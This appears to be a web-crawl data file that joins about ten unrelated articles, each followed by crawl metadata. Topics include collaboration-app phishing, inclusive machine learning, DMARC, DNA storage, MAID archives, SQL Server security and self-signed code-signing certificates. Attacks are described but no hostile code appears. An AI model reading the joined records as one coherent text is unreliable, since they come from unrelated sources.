which is offering up to $10 million in lending to companies, and instead installing a remote hacking tool to steal passwords Phishing has long been a problem—indeed, it's the top threat, as backed up by the findings of the Verizon Data Breach Investigation Report—and a staggering 91% of breaches start with email. Hackers will take advantage of anything to get the information. COVID-19 was, and remains, the perfect storm. When work went remote, these platforms were perfectly set up for success. And, in particular, Teams has grown exponentially. By June, Microsoft Teams grew by 894% compared with usage in the middle of February. As of April, it was reporting 75 million users. Slack has also broken records for usage. And that's not to mention other collaboration apps that have made working from home even a possibility—OneDrive, SharePoint, Google Drive, Dropbox, etc. That these apps exist has made the transition to working from home possible has been one of the saving graces of a tumultuous year. But these apps are not without risks. Slack and Teams are particularly prone to DLP, malware and insider threats. They're also perfect vectors for East-West attacks. In one recent Teams attack, for example, a simple animated GIF was used to steal the user’s session token and gain access to their account. A malicious cat video that would have been blocked had it been sent via email was able to spread unfiltered on Teams. Worse, this attack gave attackers full access to the users' entire account, making it easy to continue the spread. If work is going to continue remotely for the foreseeable future, businesses have to think about securing the entire ecosystem. Securing email is no longer enough. Every platform where data and information lives has to be protected. How do we make sense of a cyber year different from all others? Perhaps we don't. But if there's one thing we've learned from 2020, being proactive with protection is key. If everything important in your environment is properly secured, then business can continued unabated. Risks will never go away. Hackers will find new motivations to target end-users. And whenever there is data to be had, there will be those looking to profit from it. If there's anything to take away from Cybersecurity Awareness Month, perhaps it's this: Knowing that these risks exist is an empowering feeling. And knowing how to protect against them is even more so.
<urn:uuid:6c30cf73-cd26-4e05-8bde-7c0743f5282f>
CC-MAIN-2022-40
https://www.avanan.com/blog/cybersecurity-awareness-month-trends-dominating-the-news
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00221.warc.gz
en
0.971359
1,656
2.546875
3
You probably know that taking advantage of machine learning, or ML, requires collecting accurate data and developing algorithms that can analyze it quickly and efficiently. But here's another imperative for machine learning that businesses often overlook: ensuring that machine learning models are fair and ethical by taking an "inclusive" approach to ML. Increasingly, businesses are turning to inclusive machine learning to mitigate biases and inaccuracies that can result from poorly designed ML models. Keep reading for a look at how inclusive machine learning works, why it matters, and how to put its principles into practice. What Is Inclusive Machine Learning? Inclusive machine learning is an approach to ML that prioritizes fair decision-making. It's called inclusive because it aims to remove the biases that could lead to unfair decisions by ML models about certain demographic groups. For example, inclusive ML can help businesses avoid ML-powered facial recognition tools that disproportionately fail to recognize people of certain ethnicities accurately. Or, it could help develop chatbots that are able to handle queries in non-standard dialogues of a given language. The Benefits of Inclusive Machine Learning Perhaps the most obvious reason to embrace inclusive machine learning is that it's simply the right thing to do in an ethical sense. Businesses don't want their employees to make biased decisions when the decision-making process takes place manually, so they should seek to avoid bias in automated, ML-driven decision-making, too. But even if you set ethical considerations aside, there are business-centric benefits to inclusive ML: - Reach more users: The more fair and accurate your models, the better positioned you'll be to serve as broad a set of users as possible. - Create happier users: You'll achieve a better user experience, and generate happier users, when your ML models make accurate decisions about everyone. - Reduce complaints and support requests: Unfair ML can lead to problems like failure to log in using facial recognition. Those problems turn into support requests that your IT team has to handle. With inclusive ML, however, you can avoid these requests — and reduce the burden placed on your IT team. - Make more use of ML: When you embrace inclusive ML and design models that are fair and accurate, you can make use of ML in parts of your business where you otherwise may not be able to, due to the risk of inaccurate decision-making. You don't need to have an MBA to read between the lines here: Inclusive machine learning translates to happier users, greater operational efficiency, and — ultimately — more profit for your business. So, even if you couldn't care less about ethics, it's smart from a business perspective to implement inclusive ML. How Does Inclusive ML Work? Inclusive machine learning requires two key ingredients: fair models and fair training data. Fair ML models ML models are the code that interprets data and draws conclusions based on it. The way that you build fair ML models will depend on which type of model you are creating and which data it needs to analyze. In general, however, you should strive to define metrics and analytics categories that avoid over- or underrepresenting a given group. As a simple example, consider an algorithm that analyzes faces and assigns a gender label to each one. To make your model inclusive, you'd want to avoid having "male" or "female" be the only gender categories you define. Fair training data Training data is the data that you feed to ML models to help them learn to make decisions. For instance, a model designed to categorize pictures of faces based on gender could be trained with a data set of images that are prelabeled based on gender identity. To be fair and unbiased, your training data should represent all possible users about whom your model may end up making decisions once it is deployed, rather than only a subset. A classic example of biased training data is a data set made up of pictures of faces of people from only one ethnic group. A model trained with data like this would likely not be able to interpret the faces of people of other demographics accurately, even if the model itself was not biased. How to Get Started with Inclusive ML Currently, there's no easy solution to inclusive machine learning. There are no tools that you can buy or download to ensure that your models and training data are fair. Instead, inclusive machine learning requires making a deliberate decision to prioritize fairness and accuracy when designing models and obtaining training data. You should also carefully evaluate the decisions that your ML models are making to identify instances of bias or unfairness. These practices require effort, but they deliver benefits in the form of happier users and a more effective business. About the authorChristopher Tozzi is a technology analyst with subject matter expertise in cloud computing, application development, open source software, virtualization, containers and more. He also lectures at a major university in the Albany, New York, area. His book, “For Fun and Profit: A History of the Free and Open Source Software Revolution,” was published by MIT Press.
<urn:uuid:2218307d-f301-4994-a089-7f58e74ae04f>
CC-MAIN-2022-40
https://www.itprotoday.com/cloud-computing-and-edge-computing/how-inclusive-machine-learning-can-benefit-your-organization
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00221.warc.gz
en
0.953445
1,035
3.609375
4
Cybersecurity awareness has never been more important than it is right now. Governments, businesses, and individuals are increasingly under attack by cybercriminals looking for profit or political gain. It seems like everywhere you look, malware attacks are on the rise, from cyberespionage attempts on mobile phones to ransomware attacks on businesses. The topic even received national attention in the first presidential debate, where Democratic nominee Hillary Clinton said, "I think cybersecurity will be one of the biggest challenges facing the next president." It's a challenge for government and industry, yes, but it's also a responsibility for each one of us to do our part. And that's why we're putting a spotlight on National Cybersecurity Awareness Month (NCSAM). NCSAM, observed every October, was created by the Department of Homeland Security and the National Cyber Security Alliance to ensure that every American has the resources they need to stay safer and more secure online. And here's how we'd like to help. Start building up your cyberknow-how by perusing our basic cybersecurity articles in the 101 category on Malwarebytes Labs. Next, you can level up to news about the latest in cybercrime, and, if you're already a cyberaficionado, then head on over the threat analysis for a deep dive on malware intelligence. Here are a few of our favorite articles to start things off: - How to tell if you're infected with malware - 10 easy steps to clean your infected computer - 10 easy ways to prevent malware infection - Do I really need anti-malware for my Mac? - Top 10 ways to secure your mobile phone - Hacking your head: how cybercriminals use social engineering Thanks, and happy (safe) surfing!
<urn:uuid:bbcd69ef-5f32-4119-94b4-f7d164304dab>
CC-MAIN-2022-40
https://www.malwarebytes.com/blog/news/2016/10/october-is-national-cybersecurity-awareness-month
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00221.warc.gz
en
0.945135
357
2.890625
3
What is DMARC? DMARC stands for Domain-based Message Authentication, Reporting, and Conformance. It was developed in 2012 to combat phishing emails and is designed to work on top of SPF and DKIM. A domain’s DMARC policy is part of its DNS record. There are two parts to this protocol: reporting and conformance. The reporting component allows domain owners to monitor the authentication of emails (which is done by the ISPs). The conformance component allows domain owners to dictate how ISPs handle unauthenticated emails. It allows companies to control who can send email from their domains, and therefore prevent phishing on their domains. That’s why every company needs DMARC. The DMARC policy can be set to one of three levels: “none,” which monitors authentication but doesn’t take any actions against unauthenticated messages “quarantine,” which is used as a ‘soft block’ of unauthenticated messages while SPF and DKIM policies are worked out; and “reject,” which completely secures the domain once the SPF and DKIM policies are configured correctly and blocks all unauthenticated messages.These 3 levels allow companies to monitor and configure settings accurately so legitimate emails get delivered to inboxes and spoofed emails get blocked: - None - allows monitoring only without interrupting the flow of email. It’s the first step towards securing the domain. Emails can still be spoofed as the company identifies email sending services through DMARC reports. NOTE: this is distinct from having no policy, which means the domain does not use DMARC and cannot see when attackers spoof their domain. - Quarantine- allows for a “soft block” on spoofed emails. It’s the intermediate step that allows companies to double-check configurations. Spoofed emails go to the recipient’s spam folder, and DMARC reports inform the company about it. - Reject- allows companies to completely lock down their domains against spoofed emails. Spoofed emails are not delivered, and the company knows about the attempt through DMARC reports. Here’s an example of how it works: You send email from [email protected]. To use DMARC, you set your DMARC policy to “none,” and the setting is hosted in your DNS record. That’s all you have to do to get started with DMARC. Once you have a policy, you can start monitoring your email authentication through DMARC reports. As you begin to get a better idea of how your SPF and DKIM policies are working, you can increase your security to “quarantine,” which tells ISPs to send unauthenticated email from your domain to spam. Once you’re confident that your SPF and DKIM policies are working the way you want, you can set your DMARC policy to “reject.” This tells ISPs not to deliver any unauthenticated emails from your domain. A reject policy is the most secure, but if it’s put in place too quickly without first testing your settings, it could result in ISPs blocking your legitimate emails. There are some scenarios, like forwarded messages, in which the above process becomes more complicated However, DMARC reports provide a record of how all emails sent from “you” were authenticated. These reports can be used to determine if SPF and DKIM are correctly implemented and identify when phishing emails are sent using your domain. DMARC reports provide actionable information that will help you properly secure your domain and protect your employees, your customers, and your reputation.
<urn:uuid:e63543a8-6264-4a58-87bc-5fe687acadf1>
CC-MAIN-2022-40
https://fraudmarc.com/post/about-dmarc
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00221.warc.gz
en
0.93799
755
2.96875
3
Students at Eindhoven University of Technology in the Netherlands have developed ZEM Zero Emission Mobility, a two-seat eco-friendly car with a Cleantron lithium-ion battery pack and 3D printing made of recycled plastic. The sporty all-electric car is similar to a BMW coupe, but unique in that it absorbs more carbon than it emits and produces almost no waste during production. The ultimate goal, according to Jens Lahaije, finance manager at TU/ecomotive, the car’s development team, is to ensure a greener future, and the goal is to minimize carbon dioxide emissions throughout the life of the car, from manufacture to recycling. ZEM, an electric car that purifies the air while driving, uses two filters that can capture up to 2 kilograms of CO2 over 20,000 miles, in line with the team’s vision of having filters that can be emptied at charging stations in the future. Students will take their vehicle, designed to be easily separated and recycled at the end of its use, on a promotional tour of the United States, visiting universities and businesses from the East Coast to Silicon Valley. The sources for this piece include an article in Reuters.
<urn:uuid:fa391971-6bd9-42a5-911e-426ce8e46b94>
CC-MAIN-2022-40
https://www.itworldcanada.com/post/dutch-university-students-invent-eco-friendly-car
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00421.warc.gz
en
0.94835
254
2.59375
3
The world is made up of ones and zeros. Almost all aspects of our everyday lives have become digitized and turned into the universal language of computers. All businesses are going through this digital transformation whether they want to participate or not. Even entire government systems are turning completely paperless. Dubai is the first government to go completely paperless, but it almost certainly won’t be the last. The Emirate’s Crown Prince stated it would equate to a savings of $350 million and 14 million man-hours across the Dubai government. He also stated that this digital journey will allow and inspire its future governments to one day build a successful smart city. While all of the world’s data lives in the digital world, the space it requires occupies the real physical world as well. Some of the largest companies in the world also have the data centers to show for it. Google has 15 data centers, Amazon has 14 data centers, and Facebook has 12 data centers, which all add up to 15 million square feet of physical space. Additionally, there are 7.2 million data centers around the world taking up added space. There are several data storage technological advancements that could potentially change how the world stores data very shortly including nanotechnology and DNA data storage. Nanotechnology refers to the technology with measurements on the nanometer scale. These technologies include the handling and controlling of separate atoms and molecules. Nanotech is already being implemented to revolutionize technology in many different industries which include information technology, medicine, homeland security, energy, and environmental science. An example of the nanotech being implemented is with solar panels incorporating nanoparticles for a more lightweight and flexible solar cell. As nanotechnology is a general term, nanocomputing is a more specific term that refers to computing processes on the nanometer scale. It depicts the handling and processing of data with computers smaller than a micrometer. Specifically, a nanocomputing device is comprised of transistors that are less than 100 nanometers in length. One nanometer is one billionth of a meter. A nanometer is a unit of measurement that might be too theoretical to grasp, so we’ll use some everyday examples. A regular sheet of paper has a thickness of about 100,000 nanometers. A strand of human hair is about 75 microns, which is equivalent to 75,000 nanometers. In comparison, if the diameter of marble were equal to one nanometer, the diameter of the earth would be equivalent to one meter. Lastly, a strand of human DNA (deoxyribonucleic acid) is 2.5 nanometers in diameter. A nanocomputer uses nanotechnology with circuits and chips too small to be seen without a microscope. Nanocomputers work by storing the data on quantum dots. These nanocomputers are just like the computers we use every day, but with significantly smaller microchips. Current computer chips are made of semiconductors made of silicon. Nanocomputers have semiconductors that are under one hundred nanometers in length. The size of nanotechnology brings us to the developing concept of DNA storage. Nanotechnology will help bring in the era of a new type of storage. It’s estimated that 64.2 zettabytes of data was created, captured, copied, and consumed in 2020 and will rapidly grow to 180 zettabytes by 2025. To put this into perspective, one zettabyte is equivalent to one thousand exabytes, or one billion terabytes, or one trillion gigabytes. This is a lot of data that, as mentioned earlier, will require both digital and physical space. The growing need for data storage is pushing innovations in technology. Microsoft already has some of the technology needed for synthesizing, copying, and reading DNA for genetic sequencing, but to use DNA as a way to store data, more research and innovation still need to be done. Researchers are still working on manipulating spots and distances within strands to see the best way to store data. This includes applying a voltage that produces acid at the anode to enable the DNA chain to attach and release. Innovations are still being worked on. But there is a lot of potential in DNA storage. It is what holds all of the details of every living creature, and what makes every person different from the next. This means that tremendous amounts of data can be stored within the strands of DNA. Millions of digital files including photos, videos, and all documents could be stored on one small fragment of DNA. Innovations in data storage are vital because of how much data the world is currently creating. Again, it is estimated that the world will have produced 180 zettabytes of data by 2025. This data will require both digital and physical space. If the three largest companies are taking up 15 million square feet of space alone, there will certainly be a need for innovations in data storage. Some well-known drive manufacturers including Western Digital and Seagate are a part of a coalition of over 40 companies looking to further DNA storage. The DNA Data Storage Alliance also includes tape experts Spectra Logic and Quantum, as well as various bioscience organizations. All of these diverse companies coming together to assist in innovating the technology of DNA storage shows its importance. Although synthetic DNA storage isn’t quite ready to replace current storage systems, Microsoft’s latest developments and union of the DNA Data Storage Alliance points to a future that includes synthetic deoxyribonucleic acid data storage. As the world continues down this path of immense usage and even reliance on data—data storage will always be essential. Data storage solutions will continue to be vital, and innovations in these solutions will need to be modernized. Nanotechnology and nanocomputing will be significant technology that will contribute to bringing in a new era of data storage. DNA storage looks to be one of the more intriguing answers to future storage. Data centers will be important for years to come, and the evolution of data centers will be reliant on the technologies being developed today.
<urn:uuid:070d67b9-cf28-4cb2-aedc-df663bbb9526>
CC-MAIN-2022-40
https://www.colocationamerica.com/blog/nanotech-and-dna-storage-soon
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00421.warc.gz
en
0.940286
1,220
3.1875
3
MAID, or massive array of idle disks, has the potential to make disk-based storage the archive technology of choice in the future. The selling point of MAID is that it delivers performance in the hard-drive-array class when data is requested yet reduces the amount of energy wasted when archive data is in idle mode . The reduction in power consumption and heat that the MAID model provides puts disk almost in the energy-efficiency class of tape. MAID products are disk-based archives with unique capabilities that not only minimize power consumption but also prolong the lives of hard drives. The MAID concept has been around for a while, but there is currently only one company delivering live MAID solutions: Copan Systems. As utility costs and the demand for rapid data access continue to rise, MAID could become even more compelling for long-term storage archiving. At any given time, only about 25 percent of the disks in a MAID archive are active, with the other 75 percent in an idle state. A MAID system will consume about one-fourth to one-fifth the amount of power of a standard hard-drive-based archive, depending on how often data is accessed. MAID naysayers often bring up the issue of stiction (static friction) when explaining why MAID is not currently widely used. Stiction is defined as a hard drive failure that occurs when the heads of a hard drive do not lift when platters are spun up. Stiction most often occurs when a hard drive is activated after a long period of inactivity. Indeed, unlike tape, hard drives were not designed to sit idle for long periods of time. Copan therefore integrated automation programs in its MAID products that exercise the hard disks in an archive from time to time. Copans appropriately named Disk Aerobics technology periodically spins up idle disks and runs consistency checks to ensure that the data residing on the drives is valid. Disk Aerobics is a novel concept, and it will likely help make sure stiction problems do not occur. However, MAID products are still in their infancy, so IT managers would be right to be somewhat doubtful about the expected life span of a MAID archive. Copans MAID offerings, including the Revolution 220 family of products, use RAID 5 to ensure that data is protected, even if a drive happens to fail. eWEEK Labs assumes that RAID 6 could be implemented to provide dual parity, ensuring that data would not be lost even in the event that two drives in a given RAID set die simultaneously. When we spoke to Copan officials, however, they said they have no immediate plans to move to RAID 6 because their reliability record has been strong so far. Copans first archive unit, released in August 2004, functioned as a VTL (virtual tape library), and the company has since added file-share-level access to its MAID archives. The smallest Copan system comes in at 28TB; priced at $3.75 per gigabyte, that makes it about $108,000.
<urn:uuid:bad498e5-93de-484e-a2a2-a5260517b430>
CC-MAIN-2022-40
https://www.eweek.com/storage/storage-maid-to-order/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00421.warc.gz
en
0.960179
624
2.984375
3
Evolution of Technologies To paraphrase science fiction author Arthur C. Clark, those who make predictions about the future are either “considered conservative now and mocked later, or mocked now and proved right when they are no longer around to enjoy the acclaim.” The one thing we can be sure about, Clark ventured, is that “[the future] will be absolutely fantastic.” This was in 1964, and in the decades that followed this statement Clark was able to enjoy the excitement of technological evolution himself. But technology is constantly improving, the boundaries of human comprehension are constantly being stretched, and new technologies and advancements are being discovered at a greater rate than ever before. These don’t always make headline news because they don’t always have an immediate impact on our lives. The media is interested in the flying cars, hover boards and jetpacks of science fiction, and tend to shun everything else. But as this infographic (Infographic Courtesy of: Visual Capitalist) proves, every passing year brings with it a wealth of new discoveries, ones that even Arthur C. Clark—a man who lived to see most of his predictions come to fruition and one who marveled at technology until the end—would have been impressed with. These are the building blocks of future technologies, the things that will soon have an impact on the way we shop, the way we eat and the way we heal. This is science fiction made science fact—it doesn’t get more exciting than this. By David Jester Established in 2009, CloudTweaks is recognized as one of the leading authorities in cloud connected technology information, resources and thought leadership services. Contact us for ways on how to contribute and support our dedicated cloud community.
<urn:uuid:718c84ff-b645-4e38-ae7f-f2b21916c8be>
CC-MAIN-2022-40
https://cloudtweaks.com/2016/07/sci-fi-predictions-come-fruition/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00421.warc.gz
en
0.95567
357
2.515625
3
Why Do Data Analysts Use SQL? There are some major advantages to using traditional relational databases, which we interact with using SQL. The five most apparent are: - SQL is easy to understand. - Traditional databases allow us to access data directly. - Traditional databases allow us to audit and replicate our data. - SQL is a great tool for analyzing multiple tables at once. SQL allows you to analyze more complex questions than dashboard tools like Google Analytics. SQL vs. NoSQL You may have heard of NoSQL, which stands for not only SQL. Databases using NoSQL allow you to write code that interacts with the data a bit differently than what we will do in this course. These NoSQL environments tend to be particularly popular for web-based data, but less popular for data that lives in spreadsheets the way we have been analyzing data up to this point. One of the most popular NoSQL languages is called MongoDB. Why Businesses Like Databases - Data integrity is ensured – only the data you want to be entered is entered, and only certain users are able to enter data into the database. - Data can be accessed quickly – SQL allows you to obtain results very quickly from the data stored in a database. Code can be optimized to quickly pull results. - Data is easily shared – multiple individuals can access data stored in a database, and the data is the same for all users allowing for consistent results for anyone with access to your database. SQL Server Authentication and Authorization Protecting data starts with the ability to authenticate users and authorize their access to specific data. To this end, SQL Server includes an authentication mechanism for verifying the identities of users trying to connect to a SQL Server instance, as well as an authorization mechanism that determines which data resources that authorized users can access and what actions they can take. Authentication and authorization are achieved in SQL Server through a combination of security principals, securables, and permissions. Before I get into these, however, it’s important to note that SQL Server supports two authentication modes: Windows Authentication, sometimes referred to as integrated security, and SQL Server and Windows Authentication, sometimes referred to as mixed mode. Windows authentication is integrated with Windows user and group accounts, making it possible to use a local or domain Windows account to log into SQL Server. When a Windows user connects to a SQL Server instance, the database engine validates the login credentials against the Windows principal token, eliminating the need for separate SQL Server credentials. Microsoft recommends that you use Windows Authentication whenever possible. In some cases, however, you might require SQL Server Authentication. For example, users might connect from non-trusted domains, or the server on which SQL Server is hosted is not part of a domain, in which case, you can use the login mechanisms built into SQL Server, without linking to Windows accounts. Under this scenario, the user supplies a username and password to connect to the SQL Server instance, bypassing Windows Authentication altogether You can specify the authentication mode when setting up a SQL Server instance or change it after implementation through the server’s properties, as shown in Figure 1. At the heart of the authentication and authorization mechanisms are the principals, securables, and permissions that must be configured to enable users to access the data they need, while preventing unauthorized users from accessing data they shouldn’t. You can view and work with principals, securables, and permissions through SQL Server Management Studio (SSMS), using either the built-in GUI tools or the available T-SQL statements. Figure 2 shows Object Explorer in SSMS with the expanded Security folder for the WideWorldImporters database and, below that, the expanded Security folder for the SQL Server instance. Principals are individuals, groups, or processes that are granted access to the SQL Server instance, either at the server level or database level. Server-level principals include logins and server roles, which are listed in the Logins and Server Roles subfolders in the Security folder: - A login is an individual user account for logging into the SQL Server instance. A login can be a local or domain Windows account or a SQL Server account. You can assign server-level permissions to a login, such as granting a user the ability to create databases or logins. - A server role is a group of users that share a common set of server-level permissions. SQL Server supports fixed server roles and user-defined server roles. You can assign logins to a fixed server role, but you cannot change its permissions. You can do both with a user-defined server role. Database-level principals include users and database roles, which are listed in the Users and Roles subfolders in the database’s Security folder: - A database user is an individual user account for logging into a specific database. The database user commonly maps to a corresponding server login in order to provide access to the SQL Server instance as well as the data itself. However, you can create database users that are independent of any logins, which can be useful for developing and testing data-driven applications, as well as for implementing contained databases. - A database role is a group of users that share a common set of database-level permissions. As with server roles, SQL Server supports both fixed and user-defined database roles. For each security principal, you can grant rights that allow that principal to access or modify a set of securables. Securables are the objects that make up the database and server environment. They can include anything from functions to database users to endpoints. SQL Server scopes the objects hierarchically at the server, database and schema levels: - Server-level securables include databases as well as objects such as logins, server roles, and availability groups. - Database-level securables include schemas as well as objects such as database users, database roles, and full-text catalogs. - Schema-level securables include objects such as tables, views, functions, and stored procedures. Permissions define the level of access permitted to principals on specific securables. You can grant or deny permissions to securables at the server, database, or schema level. The permissions you grant at a higher level of the hierarchy can also apply to the children objects, unless you specifically override the permissions at the lower level. For example, if you grant the SELECT permission to the user1 principal on the Sales schema in the WideWorldImporters database, the user will be able to query all table data in that schema. However, if you then deny the SELECT permission on the Sales.Customers table, the user will not be able to query that table, but will still be able to access the other tables in that schema. You can use SSMS or T-SQL to view the permissions that have been explicitly granted to a user on a securable. For example, Figure 3 shows the permissions granted to the user2 principal on the Sales.Customers table. In this case, the user has been granted the UPDATE permissions, with no permissions explicitly denied. Configuring permissions for multiple principles on multiple securables can be a complex and sometimes frustrating process. If you don’t get it right, you could end up denying permissions to users who should have access to specific data or, worse still, granting access to users who should not. The safest bet is to follow the principles of least privilege, working at the most granular level practical for a given situation. Additional Access Control Features SQL Server also provides several other features for controlling access to data. For example, you can implement row-level security on a specific table by creating a security policy that calls one or more predicates. A security policy defines the structure necessary to apply row-level security to a table. A predicate is a table-value function that provides the logic necessary to determine which rows the security policy applies to. A security policy supports two types of predicates: filter and block. A filter predicate filters the rows available to read operations, and a block predicate blocks write operations that violate the predicate. You can include both filter and block predicates within a security policy, and you can call the same or different predicate functions within that policy. For example, the WideWorldImporters database includes the FilterCustomersBySalesTerritoryRole security policy, which defines both a filter predicate and block predicate. Figure 4 shows the security policy as it is listed in Object Explorer, along with the policy definition. In this case, both the filter predicate and block predicate call the DetermineCustomerAccess function, which determines which rows the current user can access. Another SQL Server security feature is the application role, which is similar to the database role, except that it is used specifically to assign permissions to an application. However, unlike database roles, application roles do not contain members. In addition, they’re invoked only when an application connects to SQL Server and calls the sp_setapprole system stored procedure, passing in the name of the application role and password. SQL Server enforces the permissions granted to the application role for the duration of the connection. Another access mechanism that SQL Server provides is the credential, a server-level object (record) that contains authentication information such as a username and password. The credential makes it possible for a SQL Server user to connect to a resource outside of the SQL Server environment. For example, you can use a credential to run an external assembly or to access domain resources if you’ve logged in using SQL Server Authentication. SQL Server Data Encryption Also important to SQL Server security are the encryption capabilities built into the database engine. Encryption provides a way to encode—or obfuscate—data so that only authorized users can view the data in an unencrypted state. To everyone else, the encrypted data looks like gibberish. Encryption is not an access-control mechanism, that is, it does not prevent unauthorized users from accessing data. However, encryption can limit the exposure of sensitive data should unauthorized users manage to break through SQL Server’s access-control defenses. For example, if cybercriminals acquire encrypted credit card information from a database, they will not be able to make sense of that data unless they’ve also figured out a way to decrypt it. SQL Server supports several approaches to encryption to accommodate different types of data and workloads. For example, you can encrypt data at the column level by taking advantage of SQL Server’s built-in encryption hierarchy and key management infrastructure. Under this model, each layer encrypts the layer below it, using a layered architecture made up of a public key certificate and several symmetric keys. In this way, the column data is always protected until it is specifically decrypted. Another tool available to SQL Server is Transparent Data Encryption (TDE), which encrypts and decrypts both data and log files in real-time, working at the page level to ensure that data at-rest is protected. The database engine encrypts the pages before writing them to disk and decrypts them when reading the pages into memory. Unlike column-level encryption, an application does not have to take specific steps to decrypt the data. The entire process occurs behind the scenes. SQL Server also supports the Always Encrypted feature, which makes it possible for a client application to handle the actual encryption operations, without the encryption keys being revealed to the database engine. However, to implement Always Encrypted, you must first generate the column encryption keys necessary to support Always Encrypted. To do so, you can use the Always Encrypted wizard in SSMS, as shown in Figure 5. Once the columns have been encrypted, the data is ready for client access. However, for a client application to connect to encrypted data, it must incorporate a driver that is enabled for Always Encrypted and can handle the encryption and decryption operations. Another useful SQL Server security feature is Dynamic Data Masking (DDM), a tool for masking all or part of data values. Although DDM doesn’t actually encrypt the data, it does limit the amount of exposed data to non-authorized users. For example, you can use DDM to mask all but the last four digits of a credit card number or national identifier such as a social security number. SQL Server Tools SQL Server includes a number of other tools to help protect data and limit risks. For example, you can use SQL Server Configuration Manager to configure startup or connection options, or use the sp_configure stored procedure to configure global SQL Server settings. SQL Server also provides the Surface Area Configuration facets for enabling or disabling features at the instance level, as shown in Figure 6. You can use these tools to ensure that only those features essential to supporting your users and applications are enabled at any given time, helping to reduce the exposed surface area and consequently the level of risk. SQL Server also provides tools for identifying potential database issues. For instance, SQL Server provides the TRUSTWORTHY property as one of its database properties. The property shows whether the current SQL Server instance can trust the database and its contents. In addition, SSMS provides the Data Discovery & Classification feature for classifying, labeling, and reporting on potentially sensitive data in a database, as well as the SQL Vulnerability Assessment (SVA) tool for discovering, tracking, and addressing potential database vulnerabilities. Figure 7 shows the results of running an SVA assessment against the WideWorldImporters database in SQL Server 2017. One of the most valuable SQL Server security tools is SQL Server Audit, which provides a structure for tracking and logging events that occur within the database engine. With SQL Server Audit, you can monitor events at the server level, database level, or both. SQL Server Audit comprises three primary component types. The first is the audit object, which provides a structure for carrying out the auditing process. The audit object defines a target for the audited events. The target can be log files, the Application log, or the Security log. The audit object also includes configuration settings such as the number and size of the log files. In addition to the audit object, an audit usually includes a server audit specification, a database audit specification for each applicable database, or a combination of any of these. The specifications determine which events should be audited at the server level or database level. For example, Figure 8 shows a database audit specification that audits DELETE events on the In this case, both events are specific to the user1 database user. If the user tries to update or delete data in the Customers table, SQL Server Audit will log the event to the target repository. Along with all these tools, SQL Server also provides a number of catalog views and dynamic management views for accessing security-related data. For example, you can retrieve details about the permissions granted and denied to a specific database user. Protecting a SQL Server instance In addition to taking steps within SQL Server to protect data, DBAs should also be certain to implement protections related to the SQL Server instance as a whole, such as disabling unused SQL Server components, applying security patches and service packs in a timely manner, and ensuring that database and backup files are fully protected and secure at all times. But a protection strategy should not be limited only to SQL Server. The host operating system should also be kept up-to-date and properly patched, with just as much attention paid to surface area reduction. In addition, DBAs and IT administrators must ensure that the host server is physically protected and that network safeguards such as firewalls and intrusion detection are in place. A SQL Server instance must be both physically and logically protected to achieve the maximum security. Development teams must also ensure that the applications connecting to a SQL Server instance are properly vetted for security issues. A data-driven application is at risk for a number of attacks, including connection string injections, elevation of privileges, and SQL injections. The teams should factor in data security from the start, when first designing the application, not after it’s been implemented. Securing SQL Server SQL Server security is a huge topic, and what I’ve covered here barely skims that surface. You should view this article as only a starting point, meant to alert you to the many security considerations to take into account and the different SQL Server tools available for protecting data. As this series progresses, I’ll dig deeper into the various security components, fleshing out what I’ve covered here and introducing you to concepts I’ve yet to explore. In the meantime, I recommend you learn as much about SQL Server security as possible, beginning with Microsoft’s own documentation.
<urn:uuid:0eab2e7d-58c9-4612-b80e-cc2271be6455>
CC-MAIN-2022-40
https://cybercoastal.com/cybersecurity-tutorial-for-beginners-why-sql-is-important/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00421.warc.gz
en
0.89129
3,482
3.21875
3
How to Generate a Self Signed Code Signing Certificate (And Why You Shouldn’t) While it’s possible to generate and use a self signed code signing certificate, this is a practice you should avoid doing for uses outside your organization’s internal testing environment Technically speaking, it’s possible to use self signed code signing certificates. However, doing so in public-facing applications means that the certificate won’t work for its intended purpose, which is to prove the legitimacy of your software. Nowadays, malware attacks are common. Publicly trusted code signing certificates play an essential role in helping users know whether the software applications they download or install come from trusted sources. When these certificates are issued by trusted third parties known as certificate authorities (CAs), they contain verified organization information to let users know whether a legitimate entity published it. However, a program that isn’t signed by one of these digital certificates — such as a self signed certificate that the software’s creator generates — will prompt operating systems and browsers to warn users that the executables are is from an unverified or unknown publisher. But what is a self signed code signing certificate? How do you create one? And why is it a good idea to only use publicly trusted code signing certificates? What’s a Self-Signed Code Signing Certificate? Unlike publicly trusted code signing certificates, which come from third-party certificate authorities (CAs) like Sectigo, DigiCert or Comodo, self signed code signing certificates are developed and issued by the software developers who use them. Self signed certificates have their own policies defined by software developers. Therefore, they’re not universally accepted or recognized by operating systems or major web browsers like Google Chrome or Mozilla Firefox. In other words, self signed code signing certificates are the code signing certificates signed and vouched by you and not by any third party globally trusted certificate authority. The main issue of having a self signed code signing certificate is that browsers and machines will not have your public key within their trust store as you aren’t popular or a well-known CA, and subsequently, they may not have a reason to trust you. But let’s say you still want to create self signed certificates for use within your organization’s internal environment. How would you go about doing so? How to Generate a Self Signed Code Signing Certificate The way you can generate a self signed code signing certificate is to use OpenSSL. You have a few options as to how to go about doing this, such as using Linux or PowerShell. In this case, we’ll use PowerShell’s New-SelfSignedCertificate cmdlet, which allows you to create different types of certificates for different purposes. Note: you’ll need to have administrator access. Use the following command to generate a self signed code signing certificate using this PowerShell script: $cert = New-SelfSignedCertificate -DNSName "www.yourdomain.com" -CertStoreLocation Cert:\CurrentUser\My -Type CodeSigningCert 